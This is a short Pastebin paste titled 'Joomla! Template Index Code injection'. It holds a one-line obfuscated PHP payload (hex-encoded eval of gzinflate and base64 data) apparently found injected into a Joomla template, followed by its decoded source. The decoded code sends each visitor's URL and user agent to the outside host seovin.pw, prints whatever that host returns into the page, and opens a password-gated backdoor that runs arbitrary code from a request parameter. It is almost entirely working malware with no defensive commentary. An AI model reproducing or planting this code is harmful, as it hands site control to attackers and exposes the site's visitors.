SHARE
TWEET

Joomla! Template Index Code injection

scurit Sep 9th, 2014 283 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",""); ?>
  2.  
  3. DECODED:
  4.  
  5.  
  6. <?php ?><?php if (!function_exists('indget')) {
  7.     function indget() {
  8.         error_reporting(0);
  9.         ini_set("display_errors", "0");
  10.         if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
  11.         if (preg_match('!\S!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "u";
  12.         else $c = "w";
  13.         $d = $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
  14.         $u = $_SERVER["HTTP_USER_AGENT"];
  15.         $url = "http://seovin.pw/get.php?d=" . urlencode($d) . "&u=" . urlencode($u) . "&c=" . $c . "&i=1&h=" . md5("2286bcad8cf9d1f8db884e50208a205c" . $d . $u . $c . "1");
  16.         if (ini_get("allow_url_fopen") == 1) {
  17.             return file_get_contents($url);
  18.         } elseif (function_exists("curl_init")) {
  19.             $ch = curl_init($url);
  20.             curl_setopt($ch, CURLOPT_HEADER, FALSE);
  21.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  22.             $result = curl_exec($ch);
  23.             curl_close($ch);
  24.             return $result;
  25.         } else {
  26.             $fp = fsockopen("seovin.pw", 80, $errno, $errstr, 30);
  27.             if ($fp) {
  28.                 $out = "GET /get.php?d=" . urlencode($d) . "&u=" . urlencode($u) . "&c=" . $c . "&i=1&h=" . md5("2286bcad8cf9d1f8db884e50208a205c" . $d . $u . $c . "1") . " HTTP/1.1
  29. ";
  30.                 $out.= "Host: seovin.pw
  31. ";
  32.                 $out.= "Connection: Close
  33.  
  34. ";
  35.                 fwrite($fp, $out);
  36.                 $resp = "";
  37.                 while (!feof($fp)) {
  38.                     $resp.= fgets($fp, 128);
  39.                 }
  40.                 fclose($fp);
  41.                 list($header, $body) = preg_split("/\R\R/", $resp, 2);
  42.                 $ind = 1;
  43.                 return $body;
  44.             }
  45.         }
  46.     }
  47.     echo indget();
  48.     if (@$_REQUEST["p"] == "6d629812") eval(stripslashes($_REQUEST["c"]));
  49. }; ?>
RAW Paste Data
Top